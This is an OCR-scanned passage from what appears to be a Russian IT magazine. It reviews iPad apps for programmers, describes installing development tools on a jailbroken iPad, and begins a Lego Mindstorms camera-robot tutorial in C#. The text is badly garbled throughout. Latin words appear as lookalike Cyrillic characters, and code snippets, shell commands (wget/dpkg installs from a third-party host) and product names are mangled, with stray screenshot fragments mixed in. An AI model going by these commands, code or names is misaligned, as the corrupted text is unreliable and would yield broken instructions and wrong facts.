функционалом для комфортной работы с кодом. Техіазііс не заточен под какой-либо 
один язык программирования. Из коробки подсветка синтаксиса реализована для НТМІ_, 
ЭаѵаБсгірЦ РНР, С#, РуіЬоп и других языков. Отдельного внимания заслуживает модифи- 
цированная экранная клавиатура. Разработчики Техіазііс реализовали в ней дополни- 
тельные клавиши, позволяющие быстро перемещаться в коде (в стандартной клавиатуре 
отсутствуют клавиши со стрелками) и вставлять специальные символы, не переключаясь 
между раскладками. При написании программ это очень удобно, так как для банального 
закрытия блока кода не нужно пять раз нажимать на кнопку переключения раскладки 
языка в поисках соответствующей скобки. 

Разработчики редактора Техіазііс хорошо продумали функцию обмена файлами. 
Редактор прекрасно дружит с РТР, РТР5, 5РТР, РТРЕБ, йгорЬох, ѴѴеЬйаѵ, МоЬіІеМе. Этого 
более чем достаточно для управления деревом файлов проекта. Из других функций наи- 
более значимые: поддержка внешних ВІиеІооІЬ-клавиатур; работа с файлами в различных 
кодировках (ІЭТР-8, 150-8859-1, МасРотап, АМБІ); наличие шаблонов типовых проектов; 
поддержка схем оформления кода; возможности защиты файлов проекта паролем. 



Резюме: Один из лучших редакторов для разработчиков, имеющий под капотом богатый 
функционал. Перелопаченная клавиатура добавляет огромный жирный плюс приложе- 
нию и вполне позволяет комфортно работать, не прибегая к помощи внешних устройств. 
Для полноты счастья приложению не хватает разве что возможности взаимодействия 
с сервисами контроля версий (5ѴІЧ, ОііНиЬ), но ходят слухи, что реализация этого уже 
запланирована. 




ЦЕНА ИМЕЕТ ЗНАЧЕНИЕ 



При всех плюсах возможности писать код на іРас! стоит выделить один, но для кого-то 
существенный минус — цена. Все рассмотренные в статье приложения платные, их 
стоимость начинается от 10 долларов. Для покупки всего необходимого понадобится 
около 100 долларов, а это цена профессиональной ЮЕ вроде легендарного РЬрБіогт 
от ЭеШгаіпз. Стоит ли делать такие финансовые вложения ради возможности иногда 
пописать код и выполнить несколько запросов в базе данных? 




Еазііу йпсі апуіЬіпз уои пеесі 



ПІ ИОТЕАОАМ 




Г ЗС 





■ Ргетіит Геашгез 



Ріасез 

Таяв 

ЫоГеЬоокя 
АИ ІЧоіев 



На! \ѴЬі!е а! І»лупе$ 
Езргеззо 



Асілт’з ѵѵогк Іі»! 

9 ПАА! ѴѴо* »«* в 



Вагсеіопа - зад г ас! л 
ІатШа 




Еѵегпоіе 

Арр 5!оге: аоо.дІ/ВрЬрд 

Еѵегпоіе давно стал для меня программой № 1. 
Клиентская часть этого замечательного сер- 
виса у меня установлена на всех моих рабочих 
станциях и мобильных девайсах. Инструмент 
не имеет прямого отношения к разработке, 
но лично я использую этот продвинутый блок- 
нот для сохранения всех своих идей, а также 
написания черновиков технических заданий 
будущих программ. Все набранные заметки тут 
же попадают в облако и становятся доступны- 
ми с других устройств. 

Резюме: Отличное решение для написания 
ТЗ, планов и прочей вспомогательной инфор- 
мации по проектам. Благодаря возможности 
шаринга Еѵегпоіе становится эффективным 
инструментом для командной разработки. 
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І55Н — 55Н / ѴЬІС Сопзоіе 



Арр Біоге: : ;оо.д!/ѵ9021 



Некоторые действия, свя- 
занные с разработкой, про- 
ще выполнить на сервере. 

Например, срочно загрузить 
большой файл из сети 
на удаленный компьютер 
или оперативно внести 
изменения в код рабочих 
сценариев, пересобрать 
проект на рабочем сервере 
и так далее. 

Все перечисленное про- 
ще сделать, подключившись 
по 55Н. Приложение І55Н 
на раз справляется с этой 
задачей, а попутно пред- 
лагает услуги по подключе- 
нию к ѴІМС/ПОР/Х-серверам. 

Радует, что разработчики 
снабдили свой продукт 
такими необходимыми 
вещами, как адаптивный 
размер окна терминала (все 
корректно отображается 
как на іРасІ, так и на іРЬопе); 
дополнительный скроллер 
(предоставляет быстрый 
доступ к клавишам <РдІІр>, 

<Ноте>, <ЕпсІ>, <РдОп>), упрощающий работу в псевдографических 
приложениях; возможность формирования Р5А- и 05А-ключей; функ- 
ция автоматической передачи публичных ключей. 




Резюме: Для своей цены это настоящий комбайн, который приго- 
дится не только разработчикам, но и администраторам. Я использую 
данное приложение как на ІРЬопе, так и на ІРасІ. В обоих случаях І55Н 
работает корректно и позволяет нормально решать задачи, связанные 
с администрированием сервера или проекта. 



Му50І_ Есіііог Рго ( 

Арр ьіоге: аоо.дІ/РХМЬС 

Нередко при внесении изменений в код сценариев нужно переписать запросы 
к базе данных. Упростить выполнение этих операций на мобильном рабочем 
месте поможет приложение Му5СІІ_ Есіііог Рго. Оно обеспечивает подсветку 
синтаксиса запросов и возможность взаимодействия с сервером баз данных 
поверх 55Н-соединения (это огромный плюс, так как ни один нормальный хо- 
стер не предоставляет возможности установки прямого соединения с СУБД). 

Разработчики не оставили без внимания и административную часть. 
МуБСИ ЕсМог Рго поддерживает функцию управления аккаунтами пользова- 
телей, позволяющую выполнить настройку прав доступа. 

Му5СІІ_ Есіііог Рго также готов похвастаться умением работать с триггера- 
ми, представлениями, генерированием ОБЬсценариев и множеством других 
функций, которые большинству пользователей вряд ли понадобятся с ІРасІ. 

Резюме: Добротный клиент для Му5СІІ_. Интерфейс приложения достаточно 
хорошо продуман и позволяет быстро перейти к выполнению нужной опера- 
ции. Если задач с администрированием МуБСІІ- возникает много, а рядом нет 
нормального компьютера, то Му5СІІ_ Егіііог Рго однозначно станет хорошим 
и надежным решением. 



А ЕЩЕ? 



• ЕсШог Іог ІРасІ І доо.дІ/коѵѵРа ) — простейший редактор, 
который может понравиться неприхотливым пользователям. 
Есть возможность взаимодействия с РТР и серверами Атаіоп. 
Цена 129 рублей. 

• БкеІсЬуРасІ ( доо.дІ/ѴІВдО ) — небольшое приложение, которое 
позволит тебе создавать скетчи будущих проектов на ІРасІ. 
Цена 169 рублей. 

• іМоскирв Іог ІРасІ ( доо.дІ/8пСШЕ ) — более продвинутый 
вариант приложения для создания скетчей будущего проекта. 
Позволяет создавать скетчи мобильных приложений (для 
іРЬопе, ІРасІ). Цена 229 рублей. 

• бизіо — Согіе Егіііог І доо.д1/І_Ттді ) — редактор 

для программистов. Нумерует строки кода, поддерживает 
табы, имеет встроенный РТР-клиент, подсвечивает синтаксис 
популярных языков программирования и много чего еще 
умеет. Цена 329 рублей. 

• Ѵіт ( доо.дІ/дІс8І_ ) — бесплатная реализация редактора Ѵі. 
Любителям хардкора однозначно придется по душе. 

• .ІаѵаБсгірІ АпуѵѵЬеге ( доо.дІ/У35ѴѴ5 ) — бесплатный редактор 
для редактирования и написания 35-, НТМІ_- и С55-кода. 

• Іог і: Сосіе ЕсШог Іог ІЬе ІРасІ ( доо.дІ/УОНР С) — еще один 
редактор для программистов. Поддерживает подсветку 
синтаксиса для языков С, С#, 0Ь]ес1 С, ^ѵа, НТМЦ РНР, ВиЬу 
и других. Стоимость 329 рублей. 

• Согіозаигиз І доо.дІ/гРЛ-Л — подсветка синтаксиса, РТР- 
клиент, поддержка кучи форматов, отправка почты, просмотр 
РРР-, сіос-, Х1.5-, РРТ-, РТР-файлов, шаблоны кода для НТМ1.5, 
С$5, ]Оиегу, доработанная для программистских нужд 
клавиатура — все это очередной редактор по цене 169 рублей. 

• СоНееЗсгірІ А* Опсе ( доо.дІ/2ЫрО І — бесплатный и, пожалуй, 
самый простой редактор для постановки опытов с ЦаѵаБсгірІ. 



І Саггіег 10:45 РМ Ш> 

«- Ріі - ■ -Т Щ V V 

ниыі, 

479 :ЬаЬиз‘ ѵагсЬаг(15) ЫОТ N111.1,, 

^сотшепез- СехС, 

I ' сизЬошегЫитЬѳг іпЬ(11) ЫОТ 

I шьь, 

■ РКІМАКУ КЕУ ( огсІегЫишЬег ) 

I ) ЕНСІЫЕ=МуІ5АМ ОЕГАЦЬТ 
I СНАЯ5ЕТ=1аЬіп1 ; 



— ТаЫе сіаЬа 

— огёегз 

ІЫ5ЕКТ ІЫТО с: • ( 

' огсіегЫишЬег ' , ' огсіѳгОаЬе ' , 

' гвдиігв<ЮаЬѳ ' , ‘ зЫрресШаЬе ' , 

, , 

' сизЬотегЫшпЪег ) ѴАИЛЕЗ ( 

•10100', '2003-01-06 00:00:00', 
•2003-01-1300:00:00', '2003- 
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іРасі для программиста 



геайте сЬапдеІод.... тдех.рЬр $іуіе.с$з іпгіех.Мті 



$таіпІгате ЗРасЮгу: :деІАррІісаиоп( $і*е' ) ; 

/** 

* ІЫІТІАІЛ5Е ТНЕ АРРІІСАТІОЫ 

* ЫОТЕ : 

•/ 

// 5еГ ГЛе Іапдиаде 

$таіп1гате->іпіІіаІі$е( ) ; 

ЗРІидіпНеІрег: : ітроПРІидіп( 1 $у$*ет’ ) ; 

// іпддег Ѵ\е опАиегІпіХіаІізв еѵепхв 

ЗОЕВІІС ? $ РКОРИЕР ->тагк( 'а?ІегІпіІіаІі5е' ) : пиіі; 
$таіп1гате->ІгіддегЕѵепІ( 'опАРТегІпіТіаІізе' ) ; 

/•• 

* РОІЛЕ ТНЕ АРРИСАТІОИ 

* ЙОТЕ : 

*/ 

Ітаіп*гате->гоиТе( ) ; 

// аиѴюпгаііоп 

$Иетій ■ .)Редие$1: :деІІпі( ' ИетісГ ) ; 
$таіп!гате->аиТЬогіге($Неті(і) ; 



// ігіддег ІЬе опАНегЛоиІе еѵепи 

ЗОЕВЦС ? $ РКОРН.ЕР-зипагкГаПегКоиІе) : пиіі; 
$таіпРгате->ІгіддегЕѵепТ( ‘опАРіегРоиІе* ) ; 




Косіег Сосіе ЕсІИіог 

Арр Біоге: соо .ді /гісИб 

Косіег — еще один представитель редакторов для разработчиков под Ю5, до- 
статочно сильно напоминающий Техіазііс. Косіег Сосіе Есіііог так же многогра- 
нен и не заточен сугубо на веб-разработку. Подсветка синтаксиса реализо- 
вана для многих языков программирования, в числе которых РНР, НТМЦ С5Б, 
.ІаѵаБсгірІ, ХМІ_, РиЬу, РуіЬоп, СоНРиБІоп, .Іаѵа, С#, С++ и многие другие. 

Авторы проекта достаточно неплохо продумали связь с внешним миром. 
Наверно, поэтому Косіег одинаково хорошо взаимодействует с РТР, йгорЬох, 
Юізк. Файлы передаются в обе стороны. Есть возможность правки на удален- 
ном сервере. 

Хотя это самый дешевый из редакторов подобного класса, разработчики 
снабдили свое детище упрощенной версией РігеЬид, которая однозначно по- 
радует веб-разработчиков. С полноценным огненным жуком она, конечно же, 
не сравнится, но для простенькой отладки подойдет в самый раз (возмож- 
ность просмотра определенного элемента реализована). 

Не могу не упомянуть модифицированную клавиатуру. Сделана она весь- 
ма удобно. Дополнительные кнопки, которые так необходимы в нелегком 
кодерском деле, вынесены отдельной строкой. На ней расположились кноп- 
ки для управления положением курсора, отмены/повтора ввода операции 
и специальные символы. 

Резюме: Косіег стоит дешевле, чем Техіазііс, но в функциональном плане 
практически не уступает ему. Мне очень понравилась реализация менеджера 
проектов. Модификация экранной клавиатуры также оставила приятные 
впечатления. Каких-либо проблем с редактором замечено не было. Если тебе 
не нужны излишества, то можешь смело сэкономить три бакса и отдать пред- 
почтение Косіег'у, а не Техіазііс. 



йіеі Сосіа 

Арр Біоге: аоо.дІ/В5В^ 

Компания Рапіс хорошо известна в кругах веб-программистов, 
использующих для работы ОБ X. Рапіс создала достаточно удачную 
среду веб-разработки, которая продолжает завоевывать сердца 
программеров по всему миру. Видимо, этот успех и вдохновил их 
на создание специальной версии продукта для ІРасі. Ріеі сосіа — 
полноценный мобильный редактор для веб-разработчиков, 
вобравший в себя идеи своего старшего брата и блеснувший 
мобильной оригинальностью. 

Итак, йіеі Сосіа предлагает нам: редактор с подсветкой синтак- 
сиса (раскрашивает только РНР, .ІаѵаБсгірІ, С55 и НТМЦ; про- 
стенький менеджер проектов; возможность синхронизации файлов 
проекта с десктопом; функционал для работы с файлами проекта 
на удаленном сервере; встроенный ББН-клиент; прекрасно модифи- 
цированную экранную клавиатуру и много других полезных няшек. 

Особого внимания в йіеі Сосіа заслуживает менеджер проектов. 
Он хоть и прост, но позволяет достаточно гибко управлять одновре- 
менно несколькими проектами. Например, мне по душе пришлась 
функция, позволяющая выставить права доступа на файл перед его 
передачей на сервер. Встроенный ББН-клиент вполне юзабельный 
и позволяет сэкономить на покупке отдельного приложения. Среди 
других интересных функций хочется выделить: поддержку РТР/ 
5РТР; синхронизацию с десктопной версией программы; возмож- 
ность поиска/замены по коду; экранную лупу. 

Резюме: Оіеі Сосіа получился хорошо сбалансированным редакто- 
ром, но при всем этом цена у него выше, чем у Техіазііс, а в функ- 
циональном плане он ему все же уступает. После тестирования этого 
приложения сложились двоякие впечатления. Заменить Техіазііс 
вариантом от Рапіс лично я не готов. Некоторые, пусть даже очень хо- 
рошо реализованные функции не могут сравниться с универсально- 
стью того же Техіазііс. Яркий тому пример — подсветка синтаксиса. 
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ЖИЗНЬ ПОСЛЕ ДЖЕЙЛБРЕЙКА 



Сосіеа 

Арр Біоге: доо.д1/4АдІ1 



Как ты знаешь, Сусііа — система управления пакетами, берущая 
на себя обязанности искать и устанавливать программное 
обеспечение для хакнутого Ю5. Причем главный профит 
не столько в экономии денежных средств, сколько в получении 
возможности установки аналогов «больших» приложений вроде 
АрасЬе, Му5СІІ_, РНР, СРР. Например, необходимые для веб- 
разработчика вещи (выше перечисленное + рЬрМуАсітіп + 
сборки популярных СМ5) можно найти по этой ссылке: аоо.оі/ 
^6Ыа . Инструкции по установке доступны здесь: доо.дІ/ІЕІОі . 

Установку РуіЬоп, РиЬу и других полезных разработчику 
вещей также возможно выполнить посредством Сусііа. Только 
учти, что в дефолтных репозиториях сидии на момент написания 
статьи находится лишь устаревшая версия питона 2.5. Рабочий 
питон 2.7.3 можно взять отсюда: Ыі.Іу/Ѵ2кА14 . тестировал на Ю5 
6.1 с джейлом от еѵазіОп, работает отлично. Кстати, после 
установки питона ты можешь поставить и полноценную среду 
РІапдо. Стандартная команда бысіо руЫпоп зеіир.ру іпзіаіі 
для джанги 1.4.3 отработала без ошибок. Тестовый сервер 
тоже поднялся без проблем. При наличии пакета ОрепББН, 
используя любой нормальный 55Н-клиент (только не пытайся 
приспособить для этих целей МоЬіІе ТегтіпаІ — у него есть баги 
с работой в фоне), ты можешь законнектиться сам к себе (для 
еѵазіОп пароль гооі/аіріпе) и получить полноценную рабочую 
среду для девелопа на Ріапдо. 

Чтобы поставить 6СС (в сидии 61М1) С Сотрііег), нужно 
установить АРТ 6 ТгапзШопаІ (для арі-деі, если еще не стоит), 
ѵѵдеі, а затем с его помощью загрузить и установить 
модифицированный ІіЬдсс примерно таким образом: 

м§е1: ЬТТр : / /ѵмѵі. зузЬаІІ: . пеТ/риЬ/ірЬопе/дсс-ірИопе/^ 

Таке-1іЬбсс_1.0_ірІіопео5-агт.сІеЬ 

с!рк§ -і Таке-1іЬ§сс_1.0_ірЬопео5-агт.сІеЬ 

арТ-§еТ іпзіаіі ірНопе-§сс 

ы^еТ ІгС-Ср : //ммы. зузЬаІТ . пеІі/ірНопе/есс-ірИопе/—' 

зс!к-2.0-НеасІег5.*аг.§2 

Таг -ХѴ 2 -Р зсІк-г.Ѳ-ИеасІегз.Таг.ёг 

ссі іпс1ис!е-2.0-5СІк-геасІу--Рог-ірЬопе 

ср -г * /изг/іпсіисіе 

ссі 

м§еТ Ь1:{р://ммм. зузИаІТ . пе■^:/ірI^опе/§сс-ір^^опе/♦-• 

ёСС_Я1е5 .Таг . §2 

Таг -хѵг-Р §сс_б1ез.Таг.§2 

ссі §сс_б1ез 

ср -г * /изг/ПЬ 

арТ-§еТ іпзТаІІ ІсІісІ 



ВЫВОДЫ 



іРасІ с каждой новой версией эволюционирует и становится 
мощным девайсом для выполнения самых разнообразных задач. 
К ним запросто можно отнести и программирование. Десятки 
индивидуальных разработчиков и компаний это прекрасно по- 
нимают и уже сейчас готовы предложить интересные решения 
для коллег по цеху. Не стесняйся их пробовать для решения сво- 
их задач и будь готов, что совсем скоро девайс для развлечений 
может стать полноценным инструментом разработчика. ш 



Если Техіазііс всего лишь текстовый редактор, то Сосіеа — полно- 
ценная ЮЕ. Она специально создана для программинга игр, позво- 
ляет разрабатывать и сразу же тестировать созданные приложения. 
Внезапную эйфорию советую сразу утихомирить. Сосіеа нельзя назвать 
универсальным инструментом. 

Авторы проекта предоставляют в наше распоряжение набор спрай- 
тов. Ты можешь пользоваться всем этим добром по своему усмотрению 
и создавать игрушки. Проявить творчество в полной мере не получит- 
ся, так как идущий в комплекте набор спрайтов расширить не выйдет, 
а возможности добавлять собственные изображения нет. 

В плане программирования также имеется ряд ограничений. Импорт/ 
экспорт проектов не предусмотрен (можно только отправить исходный 
код на почту), а значит, писать приложения ты сможешь только на ІРасІ. 

Готовые программы вытащить из яблочного гаджета также 
не получится, поэтому вопрос о создании коммерческой игрушки от- 
падает сразу. Вот и выходит, что нам дают неплохую нативную среду 
разработки (написание, отладка, тестирование приложения проис- 
ходит прямо на ІРасІ) с языком программирования І_иа, но творчество 
ограничено жесткими рамками. 

Резюме: Первая и на данный момент единственная нативная среда 
разработки для ІРасІ. Да, у нее есть жесткие ограничения, но винова- 
та в этом наверняка яблокомпания. Всем известно, что Арріе вводит 
жесткие ограничения на Арр Біоге и полноценную среду разработки 
они вряд ли когда-нибудь пропустят. И все-таки идея проекта Сосіеа 
интересная, и, как показала практика, нативная среда разработки 
под ІОБ более чем реальна. 



Ьооі = с1а$$() 



га 



Гшкиоп 1-ООІ: ІПІТ(рО$) 

— уои сап ассері апсі 501 рагатеіегз Неге 

5е1Г.ро5ІІіоп = ро$ 
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Самое главное: тысячи долларов, мегапрямые руки, 
микроконтроллеры, паяльники и месяцы ожидания 
компонентов из Китая не нужны. Для нашего 
проекта тебе понадобятся только ѴізиаІ Біисііо, Мі- 
сгозоО ПоЬоІісз, конструктор 1_едо МіпсЫогтз и ІР- 
камера. Поэтому читай дальше, не стесняйся — мы 
продолжаем раскрывать тему безобидного хакерско- 
программерского хобби :). 



И ПРОГРАММИМ 
САМОХОДНОГО СОГЛЯДАТАЯ 
НА БАЗЕ І.Е60 МШ05Т0КМ5 
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обота-шпиона можно сделать разными способами. Напри- 
мер, собрать его из деталей, заказанных на ѵѵѵѵѵѵ.бх.сот, или 
воспользоваться одним из доступных конструкторов для соз- 
дания роботов. Все зависит от того, какие функциональные возмож- 
ности должен иметь робот, а также от количества свободного време- 
ни и доступных денежных знаков. На момент написания статьи у меня 
под рукой оказался конструктор І_едо Міпгізіогтз 8547 и ІР-камера 
ТР-ШК (И-5С31306). Приобрести эти элементы несложно, поэтому 
ты легко сможешь повторить мою разработку. Итак, приступим. 

РАЗРАБОТКА ПРОЕКТА РОБОТА 

Конструктор І_едо М'псЫогто «из коробки» позволяет со6ра т ь 
роботов нескольких типов. Однако, учитывая массу камеры, которую 
нужно разместить на роботе, в качестве шасси лучше выбрать гусе- 
ничную платформу. 

Разрабатываемый робот должен быть автономным. Управляющий 
блок І_едо включает контейнер для аккумуляторов, а вот для камеры 
батарею нужно будет собрать. На блоке питания камеры указано, 
что она потребляет 5 В 12 А), поэтому в качестве источника питания 
можно использовать четыре аккумулятора. Если взять четыре акку- 
мулятора емкостью 2700 мА • ч, то их заряда хватит приблизительно 
на час работы (2,7 А • ч / 1,2 А = 1,3 ч). Выбор типа аккумулятора — 
задача нетривиальная. Никель-металл-гидридные аккумуляторы 
не рассчитаны на большой разрядный ток. Поэтому для питания 
камеры лучше взять никель-кадмиевые аккумуляторы, которые ис- 
пользуются в шуруповертах. Они как раз и рассчитаны на большой 
ток разряда. Параллельно соединив несколько блоков из четырех 
аккумуляторов, ты можешь увеличить емкость батареи камеры. 
Аккумуляторы, для удобства доступа и сборки, можно поместить 
в батарейный отсек. 

Телеметрия осуществляется по беспроводному каналу. Управляю- 
щий блок І_едо подключается к компьютеру по ВІиеІооіИ, ІР-камера — 
по ѴѴі-Рі. Программное обеспечение для управления роботом должно 
выполнять следующие функции: 

• предоставлять оператору робота управляющий интерфейс; 

• запрашивать изображение у ІР-камеры, отображать его на экране 

и сохранять его на диск. 

Программу управления роботом будем создавать на основе 
МісгозоД РоЬоіісб йеѵеіорег Зіисііо. 

СОЗДАНИЕ СЕРВИСА 

В меню «Пуск» выбери раздел «МісгозоК ВоЬоІісз йеѵеіорег 5іисііо» 
и запусти «055 СоттапсІ Рготрі». После запуска данной команды 
выполнится установка корневого каталога, переменных окружения, 
будут запущены служебные программы и в результате отобразится 
окно командного интерпретатора. 

Создай в каталоге установки МР05 папку зругоЬоІ и перейди 
в нее. Затем выполни команду: 




ИЗ МІЫ05Т0ЯМ5 МОЖНО СОБРАТЬ 
РОБОТОВ НЕСКОЛЬКИХ ТИПОВ. 
УЧИТЫВАЯ МАССУ КАМЕРЫ, 

ДЛЯ ШАССИ ЛУЧШЕ ВЫБРАТЬ 
ГУСЕНИЧНУЮ ПЛАТФОРМУ 



0зз№м5егѵісе /5егѵісе:5руКоЬо1:. 

Будет создан проект сервиса, включающий следующие файлы: 

1. 5руРоЬо1.сз: главный исходный файл сервиса (ядро сервиса); 

2. 5руВоЬо1.тапйез{.хт1: манифест, который используется Б55 
для загрузки сервиса (манифест — ХМЬфайл, описывающий 
сервисы, которые должны быть запущены при загрузке манифеста 
на 055-узел); 

3. 5руВоЬоПуре5.сз: содержит набор типов, которые используются 
сервисом, идентификатор сервиса, типы сообщений, обрабатывае- 
мые сервисом, и состояние сервиса. 

Добавь в проект сервиса ссылки на следующие библиотеки: 

1 . РоЬоІісзСоттоп.Ргоху.сіІІ — включает определение порта, необхо- 
димого для доступа к приводу робота; 

2. Ссг.АсіарІегз.ѴѴіпРогппз.сіІІ, 5узІет.ѴѴіпсІоѵѵ5.Рогт5.сІІІ — использу- 
ются для работы с ѴѴіпсІоѵѵз-формами в сервисах; 

3. 5узІепг».0гаѵѵіпд.сІІІ — используется для работы с Ьіітар- 
изображениями. 

Перед конструктором сервиса вставь определение партнера 
сервиса. 

Определение партнера сервиса 

[РагСпег('^х1:Огіѵе", СопТтасС = сІгіѵе.Соп^гасТі.ІсІеп-Сібег,*-' 
Сгеа-СіопРо1ісу=Раг*пегСгеа1:іопРо1ісу .изеРагСпегИз-СЕп-Сгу)] 
с1гіѵе.0гіѵе0рега*іоп5 _пх*ОгіѵеРогІ: = «-* 
пей с1гіѵе.0гіѵе0рега-1:іоп5(); 

Приведенная конструкция добавляет к сервису 5руВоЬоІ в каче- 
стве партнера (имя партнера — ЫхШгіѵе) сервис дифференциального 
привода (см. поле Сопігасі). Партнер реализует соглашение «общий 
дифференциальный привод» (депегіс сІіМегепІіаІ сігіѵе). В результате 
после настройки партнера сервис 5руВоЬо* сможет управлять робо- 
том, отправляя сообщения в порт_пхШгіѵеРогІ. 
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Рис. 1. Результат запуска манифеста 



Рис. 2. Создание манифеста 
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Робот-шпион — это просто! 



Скомпилируй сервис и запусти его на выполнение. На экра- 
не отобразится окно, показанное на рис. 1. Манифест запустился 
с ошибкой, так как партнер МхЮгіѵе настроен не был. Для настройки 
партнера необходимо создать манифест. 

РАЗРАБОТКА МАНИФЕСТА СЕРВИСА 

Открой 055 Мапі^еві Есіііог (<МР05>\Ып\б5зте.ехе). Помести 
из списка 5егѵісез в центральную часть окна сервисы БруРоЬоІ, 
І_едоМХТ0гіѵеѵ2, 1_едоМХТВгіскѵ2 и сохрани в папку, в которой на- 
ходится проект сервиса. 

Теперь необходимо настроить параметры 1_едоМХЮгіѵеѵ2 
и І_едоМХТВгіскѵ2. Выдели сервис І_едоЫХТВгіскѵ2 (см. рис. 2) и по- 
мести его в область Ьгіск сервиса 1_едоМХЮгіѵеѵ2 (результат показан 
на рис. 3). 

Далее помести сервис 1_едоМХТ0гіѵеѵ2 в область ІМхШгіѵе сервиса 
5руВоЬоІ. Название этой области соответствует имени партнера 
МхЮгіѵе сервиса 5руРоЬо*. 

Выполни настройку сервисов. Выдели сервис І_едоІ\ІХТВгіскѵ2 
и в панели Ргорегііез нажми кнопку «Сгеаіе Іпіііаі Біаіе». В результа- 
те для сервиса будет создано состояние, параметры которого нужно 
настроить так: 

1 . БегіаІРогІ — 1 5 (номер последовательного (СОМ) порта, связанного 
с ВІиеІооіЬ-адаптером); 

2. ВаисіРаІе — 115200; 

3. СоппесІіопТуре — ВІиеІооІЬ; 

4. БЬоѵѵІпВоѵѵзег — флажок не должен быть установлен. 

Выдели сервис І_едоМХЮгіѵеѵ2 и создай для него состояние по- 
добным образом. Установи значения параметров: 

1. ОізІапсеВеІѵѵеепѴѴЬееІз — 0.1 12 (расстояние между колесами, 
в метрах); 

2. 1_еКѴѴЬееІ— * МоІогРогІ — МоІогВ; 

3. І_еКѴѴЬееІ — ► МНееЮіатеІег — 0.055 (диаметр колеса, в метрах); 

4. РідМ\Л/ЬееІ-»Мо1огРогІ — МоІогС; 

5. РідМѴѴЬееІ — » ѴѴЬееЮіатеІег — 0.055 (диаметр колеса, в метрах). 

Сохрани полученный манифест. В результате будет сгенериро- 
вано три файла: БруВоЬоІ.плапіІезІ.хтІ, І_едоІЧХТВгіскѵ2.Сопбд.хтІ 
(настройки управляющего блока робота) и І_едоМХТОгіѵеѵ2.Соп(ід.хтІ 
(настройки привода робота). 

Открой в 5оІиІіоп сервиса закладку «йеЬид» и в поле «СоттапсІ 
Ііпе агдитепіз» укажи, что запускаемый манифест находится в файле 
5руРоЬоСтапі(ез1.хтІ (см. рис. 4). 

Включи робота и запусти манифест на выполнение. Откроется 
окно командной строки, в котором будет отображен процесс загрузки 
сервисов, а робот выдаст звуковой сигнал. 

РЕАЛИЗАЦИЯ ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ 

Приступим к разработке управляющей программы. Добавь в состав 
проекта сервиса форму и размести на ней компоненты, как показано 
на рис. 5. 

Обмен информацией между сервисом и формой происходит следу- 
ющим образом: 

1. сервис отправляет форме изображения, полученные от камеры; 

2. форма отправляет сервису сообщения о возникающих событиях. 



ВСЕ ЗАВИСИТ ОТ ТОГО, КАКИЕ 
ВОЗМОЖНОСТИ ДОЛЖЕН ИМЕТЬ 
РОБОТ, А ТАКЖЕ ОТ КОЛИЧЕСТВА 
ВРЕМЕНИ И ДЕНЕЖНЫХ ЗНАКОВ 
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Рис. 3. Создание связи между сервисами 

ОТПРАВКА СООБЩЕНИЙ СЕРВИСУ ИЗ ФОРМЫ 

Определи в сервисе порт_еѵепІзРогІ. Данный порт будет использо- 
ваться для получения от формы сообщений четырех типов: 0п1_оаб 
(сообщение о том, что форма загружена), ОпСІозе (сообщение о том, 
что пользователь нажал кнопку «Ехіі» на форме), ОпМоѵе (сообще- 
ние о том, что пользователь ввел команду на перемещение робота) 
и ОпРесогб (сообщение о том, что пользователь хочет запустить или 
остановить процесс сохранения изображений на диск). 

В файле 5руРоЬоГГурез.сз опиши класс РогтЕѵепІ и производные 
от него классы, которые будут использоваться при передаче сообще- 
ний о событиях формы в сервис. Одним из полей класса РогтЕѵепІ 
является свойство Рогт, которое хранит дескриптор формы, сгенери- 
ровавшей сообщение. 

Сообщения о событиях 

риЬІіс сіазз РогтЕѵепІ: { 
ргіѵаСе Рогт _*НеРогт; 
риЫіс Рогт Рогт { 
вен { 

геііигп _СІіеРогт; 

> 

зеі: { 

_*ЬеРогт = ѵаіие; 

} 

} 

риЫіс РогтЕѵепі:(Рогт -Рогт) { 

_ЫіеРогт = -Рогт; 

} 

> 

риЫіс сіазз ОШоасІ: РогтЕѵепІ: { 

риЫіс ОпІ_оасІ(Рогт -Рогт): Ьазе(-Рогт) {} 

} 

риЫіс сіазз ОпСІозе: РогтЕѵепІ: { 

риЫіс 0пС1озе(Рогт -Рогт): Ьазе(-Рогт) {} 

} 



Классы 0п1_оаб и ОпСІозе соответствуют одноименным со- 
общениям, поступающим от формы (сообщения ОпІ_оасі и ОпСІозе). 
Опиши методы, которые отправляют информацию о событиях в порт 
_еѵепІзРогІ. 

Отправка сообщения ОШоасІ в сервис 

ргіѵаіе ѵоіеі ОгіѵеСоп1:го1_І_оасІ(оЬзес1: зепсіег, ^ 
Еѵеп1:Аг§5 е) { 

_еѵеп1:5Рог-1:.Ро5і:(пеы ОпІоасІ( ТіЬіз) ) ; 

} 



Обработчик события ОпІ_оас! сохраняет указатель (Ьапсііе) на фор- 
му в переменную _ДгіѵеСопІгоІ. Указатель на форму впоследствии 
будет использоваться для загрузки в форму изображений. 
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Обработчик ОШоасІ 

ѵоісі ОпОгіѵеСопІ:го1І-оаОНапсІ1ег(Оп1.оасІ опІ_оасІ) { 
_сІгіѵеСоп1:го1 = (КоЬо-ССоп-СгоІ) оШоасІ. Рогш; 

} 

Событие ОпСІозе генерируется, когда пользователь нажимает 
на форме кнопку «Ехіі». В результате в сервис отправляется сообще- 
ние ОпСІозе, после чего обработчик ОпОгіѵеСопІгоІСІозесІНапсІІег 
завершает работу сервиса. 

Обработчик ОпСІозе 

ѵоісі 0п0гіѵеСопі:го1С1о5есІНапсі1ег(0пС1о5е ОпСІозе) { 
_таіпРог* . Роз1:(пем ОззрОе-РаиІІіОгор-^ 

(ОгорКециезІТуре. Іпзііапсе)); 

> 

УПРАВЛЕНИЕ РОБОТОМ 

Пользовательский интерфейс для управления роботом реализуем 
с помощью пяти кнопок, размещенных на форме («Вперед», «Назад», 
«Влево», «Вправо» и «Стоп»). После нажатия одной из кнопок робот 
начинает движение в заданном направлении (при нажатии на кнопку 
«Стоп» робот останавливается). Алгоритм взаимодействия пользо- 
вателя и робота прост: пользователь нажимает кнопку, обработчик 
нажатия кнопки отправляет сообщение в сервис, а сервис, в свою 
очередь, посылает управляющую команду на дифференциальный 
привод. 

При нажатии на кнопку «Вперед» вызывается метод Рогѵѵаггі, 
который передает в сервис сообщение ОпМоѵе. В сервисе сообщение 
передается в обработчик ОпМоѵеНапсІІег, который создает запрос 
ЗеЮгіѵеРоѵѵег. Данный запрос определяет количество энергии, ко- 
торое нужно подать на левое и правое ведущие колеса робота, чтобы 
он двигался в направлении, выбранном пользователем. После чего 
